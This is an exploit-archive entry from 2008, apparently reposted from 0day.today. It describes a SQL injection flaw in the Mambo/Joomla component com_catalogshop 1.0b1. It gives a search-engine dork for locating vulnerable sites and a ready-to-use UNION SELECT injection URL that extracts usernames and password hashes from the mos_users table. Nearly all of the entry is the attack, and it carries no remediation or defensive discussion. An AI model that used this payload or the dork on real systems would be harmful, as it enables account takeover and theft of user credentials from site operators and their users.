id: 2581
date: 01/31/2008
title: Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability
author: S@BUN
cves: 

=============================================================
Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability
=============================================================



#########################################################################
#
# joomla SQL Injection(com_catalogshop)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_catalogshop"
#
########################################################################
EXPLOIT :

index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*



#  0day.today [2023-03-25]  #